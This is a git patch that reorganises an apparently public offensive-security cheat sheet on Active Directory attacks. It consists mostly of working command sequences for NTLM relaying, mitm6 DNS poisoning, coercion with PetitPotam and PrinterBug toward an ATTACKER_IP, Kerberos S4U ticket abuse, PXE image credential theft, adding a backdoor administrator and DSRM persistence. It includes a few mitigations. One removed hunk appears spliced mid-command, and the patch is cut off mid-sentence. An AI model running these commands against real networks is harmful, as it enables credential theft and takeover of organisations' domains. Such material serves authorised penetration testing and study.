From 9711ac25cb67a4f907d18aae950ed33ff8af2a49 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 3 Dec 2023 14:44:59 +0100 Subject: [PATCH] AD - Pages v0.4 --- .../Active Directory Attack.md | 379 ------------------ docs/active-directory/ad-adds-enumerate.md | 2 +- .../ad-adds-group-policy-objects.md | 2 +- docs/active-directory/ad-adds-groups.md | 2 +- .../ad-adfs-federation-services.md | 2 +- docs/active-directory/internal-dcom.md | 2 +- docs/active-directory/internal-mitm-relay.md | 275 +++++++++++++ .../internal-pxe-boot-image.md | 49 +++ docs/active-directory/internal-shares.md | 2 +- docs/active-directory/kerberos-s4u.md | 26 ++ docs/active-directory/pwd-dsrm-credentials.md | 18 + 11 files changed, 374 insertions(+), 385 deletions(-) create mode 100644 docs/active-directory/internal-mitm-relay.md create mode 100644 docs/active-directory/internal-pxe-boot-image.md create mode 100644 docs/active-directory/kerberos-s4u.md create mode 100644 docs/active-directory/pwd-dsrm-credentials.md diff --git a/docs/active-directory/Active Directory Attack.md b/docs/active-directory/Active Directory Attack.md index 564c4d9..e42a0d6 100644 --- a/docs/active-directory/Active Directory Attack.md +++ b/docs/active-directory/Active Directory Attack.md @@ -11,28 +11,14 @@ - [PrintNightmare](#printnightmare) - [samAccountName spoofing](#samaccountname-spoofing) - [User Hunting](#user-hunting) - - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) - - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) - - [LDAP signing not required and LDAP channel binding disabled](#ldap-signing-not-required-and-ldap-channel-binding-disabled) - - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4) - - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) - - [Drop the MIC](#drop-the-mic) - - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - - [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay) - - [DNS Poisonning - Relay delegation with mitm6](#dns-poisonning---relay-delegation-with-mitm6) - - [Relaying with WebDav Trick](#relaying-with-webdav-trick) - [UnPAC The Hash](#unpac-the-hash) - [Shadow Credentials](#shadow-credentials) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket) - [Privileged Access Management (PAM) Trust](#privileged-access-management-pam-trust) - - [Kerberos Service for User Extension](#kerberos-service-for-user-extension) - - [S4U2self - Privilege Escalation](#s4u2self---privilege-escalation) - [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049) - [PrivExchange attack](#privexchange-attack) - - [PXE Boot image attack](#pxe-boot-image-attack) - - [DSRM Credentials](#dsrm-credentials) - [References](#references) ## Tools @@ -545,272 +531,6 @@ You can remotely query every machines on the network to get a list of the users' ``` -## Man-in-the-Middle attacks & relaying - -NTLMv1 and NTLMv2 can be relayed to connect to another machine. - -| Hash | Hashcat | Attack method | -|---|---|---| -| LM | `3000` | crack/pass the hash | -| NTLM/NTHash | `1000` | crack/pass the hash | -| NTLMv1/Net-NTLMv1 | `5500` | crack/relay attack | -| NTLMv2/Net-NTLMv2 | `5600` | crack/relay attack | - -Crack the hash with `hashcat`. - -```powershell -hashcat -m 5600 -a 0 hash.txt crackstation.txt -``` - -### MS08-068 NTLM reflection - -NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008. - -> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials. - -* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068 - -```powershell -msf > use exploit/windows/smb/smb_relay -msf exploit(smb_relay) > show targets -``` - -### LDAP signing not required and LDAP channel binding disabled - -During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed: -* LDAP signing not required (by default set to `Not required`) -* LDAP channel binding is disabled. (by default disabled) -* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default) - -Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer. -```bash -# On first terminal -sudo ./Responder.py -I eth0 -wfrd -P -v - -# On second terminal -sudo python ./ntlmrelayx.py -t ldaps://IP_DC --add-computer -``` -It is required here to relay to LDAP over TLS because creating accounts is not allowed over an unencrypted connection. - -### SMB Signing Disabled and IPv4 - -If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning** - -1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`. - ```powershell - [Responder Core] - ; Servers to start - ... - SMB = Off # Turn this off - HTTP = Off # Turn this off - ``` -2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. -3. Run `python Responder.py -I ` -4. Use a relay tool such as `ntlmrelayx` or `MultiRelay` - - `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list. - - `python MultiRelay.py -t -u ALL` -5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. - ```powershell - $ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support - [*] Servers started, waiting for connections - Type help for list of commands - ntlmrelayx> socks - Protocol Target Username Port - -------- -------------- ------------------------ ---- - MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 - SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 - MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 - - # You might need to select a target with "-t" - # smb://, mssql://, http://, https://, imap://, imaps://, ldap://, ldaps:// and smtp:// - impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support - impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support - - # the socks proxy can then be used with your Impacket tools or CrackMapExec - $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 - $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth - $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" - ``` - -**Mitigations**: - - * Disable LLMNR via group policy - ```powershell - Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled - ``` - * Disable NBT-NS - ```powershell - This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP - ``` - -### SMB Signing Disabled and IPv6 - -Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. - -```powershell -crackmapexec smb $hosts --gen-relay-list relay.txt - -# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 -# -d is the domain name that we filter our request on - the attacked domain -# -i is the interface we have mitm6 listen on for events -mitm6 -i eth0 -d $domain - -# spoofing WPAD and relaying NTLM credentials -impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt -impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug - -# -ip is the interface you want the relay to run on -# -wh is for WPAD host, specifying your wpad file to serve -# -t is the target where you want to relay to. -impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2 -``` - -### Drop the MIC - -> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP - -Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) - -```powershell -python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' -[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth -[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected) -``` - -- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD - ```powershell - TERM1> python printerbug.py testsegment.local/username@s2012exc.testsegment.local - TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support - TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc - ``` - - -- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. - ```powershell - # create a new machine account - TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support - TERM2> python printerbug.py relaytest.local/username@second-dc-server 10.0.2.6 - TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME - - # connect using the ticket - export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache - secretsdump.py -k -no-pass second-dc-server.local -just-dc - ``` - -### Ghost Potato - CVE-2019-1384 - -Requirements: -* User must be a member of the local Administrators group -* User must be a member of the Backup Operators group -* Token must be elevated - -Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impacket-ghostpotato.zip - -```powershell -ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe -``` - -### RemotePotato0 DCOM DCE RPC relay - -> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine - -Requirements: -- a shell in session 0 (e.g. WinRm shell or SSH shell) -- a privileged user is logged on in the session 1 (e.g. a Domain Admin user) - -```powershell -# https://github.com/antonioCoco/RemotePotato0/ -Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server <= 2016 -Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 -Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2 -Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' -``` - - -### DNS Poisonning - Relay delegation with mitm6 - -Requirements: -- IPv6 enabled (Windows prefers IPV6 over IPv4) -- LDAP over TLS (LDAPS) - -> ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it. - -```powershell -git clone https://github.com/fox-it/mitm6.git -cd /opt/tools/mitm6 -pip install . - -mitm6 -hw ws02 -d lab.local --ignore-nofqnd -# -d: the domain name that we filter our request on (the attacked domain) -# -i: the interface we have mitm6 listen on for events -# -hw: host whitelist - -ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad -ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad --add-computer -# -ip: the interface you want the relay to run on -# -wh: WPAD host, specifying your wpad file to serve -# -t: the target where you want to relay to - -# now granting delegation rights and then do a RBCD -ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad -getST.py -spn cifs/target.lab.local lab.local/GENERATED\$ -impersonate Administrator -export KRB5CCNAME=administrator.ccache -secretsdump.py -k -no-pass target.lab.local -``` - -### Relaying with WebDav Trick - -> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB - -**Requirement**: -* WebClient service - -**Exploitation**: -* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` -* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 -* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` -* Discover WebDAV services - ```ps1 - webclientservicescanner 'domain.local'/'user':'password'@'machine' - crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav - GetWebDAVStatus.exe 'machine' - ``` -* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. - ```ps1 - # PrinterBug - dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" - SpoolSample.exe "ATTACKER_IP" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" - - # PetitPotam - Petitpotam.py "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" - Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" - PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" - ``` -* Use the created account to ask for a service ticket: - ```ps1 - .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l -pyrdp-mitp.py : # with custom port -pyrdp-mitm.py -k private_key.pem -c certificate.pem # with custom key and certificate -``` -* Exploitation - * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge - * If NLA is disabled, you will obtain the password in plaintext - * Other features are available such as keystroke recording -* Alternatives - * S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener - - ## UnPAC The Hash Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate. @@ -1038,34 +758,6 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma ``` -## Kerberos Service for User Extension - -* Service For User To Self which allows a service to obtain a TGS on behalf of another user -* Service For User To Proxy which allows a service to obtain a TGS on behalf of another user on another service - -### S4U2self - Privilege Escalation - -1. Get a TGT - * Using Unconstrained Delegation - * Using the current machine account: `Rubeus.exe tgtdeleg /nowrap` -2. Use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine. - ```ps1 - Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001.domain.local" /ticket:"base64ticket" - Rubeus.exe ptt /ticket:"base64ticket" - - Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001" /ticket:"base64ticket" /ptt - ``` - -The "Network Service" account and the AppPool identities can act as the computer account in terms of Active Directory, they are only restrained locally. Therefore it is possible to invoke S4U2self if you run as one of these and request a service ticket for any user (e.g. someone with local admin rights, like DA) to yourself. - -```ps1 -# The Rubeus execution will fail when trying the S4UProxy step, but the ticket generated by S4USelf will be printed. -Rubeus.exe s4u /user:${computerAccount} /msdsspn:cifs/${computerDNS} /impersonateuser:${localAdmin} /ticket:${TGT} /nowrap -# The service name is not included in the TGS ciphered data and can be modified at will. -Rubeus.exe tgssub /ticket:${ticket} /altservice:cifs/${ServerDNSName} /ptt -``` - - ## Kerberos Bronze Bit Attack - CVE-2020-17049 > An attacker can impersonate users which are not allowed to be delegated. This includes members of the **Protected Users** group and any other users explicitly configured as **sensitive and cannot be delegated**. @@ -1173,77 +865,6 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th ``` -## PXE Boot image attack - -PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it. - -- Press **[F8]** during the PXE boot to spawn an administrator console on the deployed machine. -- Press **[SHIFT+F10]** during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry. - - ```powershell - net user hacker Password123! /add - net localgroup administrators /add hacker - ``` - -- Extract the pre-boot image (wim files) using [PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe)](https://github.com/wavestone-cdt/powerpxe) and dig through it to find default passwords and domain accounts. - - ```powershell - # Import the module - PS > Import-Module .\PowerPXE.ps1 - - # Start the exploit on the Ethernet interface - PS > Get-PXEcreds -InterfaceAlias Ethernet - PS > Get-PXECreds -InterfaceAlias « lab 0 » - - # Wait for the DHCP to get an address - >> Get a valid IP address - >>> >>> DHCP proposal IP address: 192.168.22.101 - >>> >>> DHCP Validation: DHCPACK - >>> >>> IP address configured: 192.168.22.101 - - # Extract BCD path from the DHCP response - >> Request BCD File path - >>> >>> BCD File path: \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd - >>> >>> TFTP IP Address: 192.168.22.3 - - # Download the BCD file and extract wim files - >> Launch TFTP download - >>>> Transfer succeeded. - >> Parse the BCD file: conf.bcd - >>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim - >>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim - >> Launch TFTP download - >>>> Transfer succeeded. - - # Parse wim files to find interesting data - >> Open LiteTouchPE_x86.wim - >>>> Finding Bootstrap.ini - >>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$ - >>>> >>>> UserID = MdtService - >>>> >>>> UserPassword = Somepass1 - ``` - - -## DSRM Credentials - -> Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or recover to repair or restore an Active Directory database. - -This is the local administrator account inside each DC. Having admin privileges in this machine, you can use mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user. - -```ps1 -Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' - -# Check if the key exists and get the value -Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior - -# Create key with value "2" if it doesn't exist -New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD - -# Change value to "2" -Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -``` - - ## References * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index aa83319..bf61629 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -1,4 +1,4 @@ -# Active Directory Enumeration +# Active Directory - Enumeration ## Using BloodHound diff --git a/docs/active-directory/ad-adds-group-policy-objects.md b/docs/active-directory/ad-adds-group-policy-objects.md index e5e088b..b1e3631 100644 --- a/docs/active-directory/ad-adds-group-policy-objects.md +++ b/docs/active-directory/ad-adds-group-policy-objects.md @@ -1,4 +1,4 @@ -# Group Policy Objects +# Active Directory - Group Policy Objects > Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner diff --git a/docs/active-directory/ad-adds-groups.md b/docs/active-directory/ad-adds-groups.md index 4a31ef6..6096af7 100644 --- a/docs/active-directory/ad-adds-groups.md +++ b/docs/active-directory/ad-adds-groups.md @@ -1,4 +1,4 @@ -# Active Directory Groups +# Active Directory - Groups ## Dangerous Built-in Groups Usage diff --git a/docs/active-directory/ad-adfs-federation-services.md b/docs/active-directory/ad-adfs-federation-services.md index 6937006..3ef9cbc 100644 --- a/docs/active-directory/ad-adfs-federation-services.md +++ b/docs/active-directory/ad-adfs-federation-services.md @@ -1,4 +1,4 @@ -# Active Directory Federation Services +# Active Directory - Federation Services ## ADFS - Golden SAML diff --git a/docs/active-directory/internal-dcom.md b/docs/active-directory/internal-dcom.md index 1e8a73a..a946b75 100644 --- a/docs/active-directory/internal-dcom.md +++ b/docs/active-directory/internal-dcom.md @@ -1,4 +1,4 @@ -# DCOM +# Internal - DCOM > DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer. diff --git a/docs/active-directory/internal-mitm-relay.md b/docs/active-directory/internal-mitm-relay.md new file mode 100644 index 0000000..b016af5 --- /dev/null +++ b/docs/active-directory/internal-mitm-relay.md @@ -0,0 +1,275 @@ +# Internal - Man-in-the-Middle and Relay + +NTLMv1 and NTLMv2 can be relayed to connect to another machine. + +| Hash | Hashcat | Attack method | +|---|---|---| +| LM | `3000` | crack/pass the hash | +| NTLM/NTHash | `1000` | crack/pass the hash | +| NTLMv1/Net-NTLMv1 | `5500` | crack/relay attack | +| NTLMv2/Net-NTLMv2 | `5600` | crack/relay attack | + +Crack the hash with `hashcat`. + +```powershell +hashcat -m 5600 -a 0 hash.txt crackstation.txt +``` + +## MS08-068 NTLM reflection + +NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008. + +> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials. + +* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068 + +```powershell +msf > use exploit/windows/smb/smb_relay +msf exploit(smb_relay) > show targets +``` + + +## LDAP signing not required and LDAP channel binding disabled + +During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed: +* LDAP signing not required (by default set to `Not required`) +* LDAP channel binding is disabled. (by default disabled) +* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default) + +Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer. +```bash +# On first terminal +sudo ./Responder.py -I eth0 -wfrd -P -v + +# On second terminal +sudo python ./ntlmrelayx.py -t ldaps://IP_DC --add-computer +``` +It is required here to relay to LDAP over TLS because creating accounts is not allowed over an unencrypted connection. + + +## SMB Signing Disabled and IPv4 + +If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning** + +1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`. + ```powershell + [Responder Core] + ; Servers to start + ... + SMB = Off # Turn this off + HTTP = Off # Turn this off + ``` +2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. +3. Run `python Responder.py -I ` +4. Use a relay tool such as `ntlmrelayx` or `MultiRelay` + - `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list. + - `python MultiRelay.py -t -u ALL` +5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. + ```powershell + $ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support + [*] Servers started, waiting for connections + Type help for list of commands + ntlmrelayx> socks + Protocol Target Username Port + -------- -------------- ------------------------ ---- + MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 + SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 + MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 + + # You might need to select a target with "-t" + # smb://, mssql://, http://, https://, imap://, imaps://, ldap://, ldaps:// and smtp:// + impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support + impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support + + # the socks proxy can then be used with your Impacket tools or CrackMapExec + $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 + $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth + $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" + ``` + +**Mitigations**: + + * Disable LLMNR via group policy + ```powershell + Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled + ``` + * Disable NBT-NS + ```powershell + This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP + ``` + + +## SMB Signing Disabled and IPv6 + +Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. + +```powershell +crackmapexec smb $hosts --gen-relay-list relay.txt + +# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 +# -d is the domain name that we filter our request on - the attacked domain +# -i is the interface we have mitm6 listen on for events +mitm6 -i eth0 -d $domain + +# spoofing WPAD and relaying NTLM credentials +impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt +impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug + +# -ip is the interface you want the relay to run on +# -wh is for WPAD host, specifying your wpad file to serve +# -t is the target where you want to relay to. +impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2 +``` + + +## Drop the MIC + +> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP + +Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) + +```powershell +python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' +[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth +[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected) +``` + +- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD + ```powershell + TERM1> python printerbug.py testsegment.local/username@s2012exc.testsegment.local + TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support + TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc + ``` + + +- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. + ```powershell + # create a new machine account + TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support + TERM2> python printerbug.py relaytest.local/username@second-dc-server 10.0.2.6 + TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME + + # connect using the ticket + export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache + secretsdump.py -k -no-pass second-dc-server.local -just-dc + ``` + + +## Ghost Potato - CVE-2019-1384 + +Requirements: +* User must be a member of the local Administrators group +* User must be a member of the Backup Operators group +* Token must be elevated + +Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impacket-ghostpotato.zip + +```powershell +ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe +``` + + +## RemotePotato0 DCOM DCE RPC relay + +> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine + +Requirements: +- a shell in session 0 (e.g. WinRm shell or SSH shell) +- a privileged user is logged on in the session 1 (e.g. a Domain Admin user) + +```powershell +# https://github.com/antonioCoco/RemotePotato0/ +Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server <= 2016 +Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 +Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2 +Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' +``` + + +## DNS Poisonning - Relay delegation with mitm6 + +Requirements: +- IPv6 enabled (Windows prefers IPV6 over IPv4) +- LDAP over TLS (LDAPS) + +> ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it. + +```powershell +git clone https://github.com/fox-it/mitm6.git +cd /opt/tools/mitm6 +pip install . + +mitm6 -hw ws02 -d lab.local --ignore-nofqnd +# -d: the domain name that we filter our request on (the attacked domain) +# -i: the interface we have mitm6 listen on for events +# -hw: host whitelist + +ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad +ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad --add-computer +# -ip: the interface you want the relay to run on +# -wh: WPAD host, specifying your wpad file to serve +# -t: the target where you want to relay to + +# now granting delegation rights and then do a RBCD +ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad +getST.py -spn cifs/target.lab.local lab.local/GENERATED\$ -impersonate Administrator +export KRB5CCNAME=administrator.ccache +secretsdump.py -k -no-pass target.lab.local +``` + + +## Relaying with WebDav Trick + +> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB + +**Requirement**: +* WebClient service + +**Exploitation**: +* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` +* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 +* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` +* Discover WebDAV services + ```ps1 + webclientservicescanner 'domain.local'/'user':'password'@'machine' + crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav + GetWebDAVStatus.exe 'machine' + ``` +* Trigger the authentication to relay to our 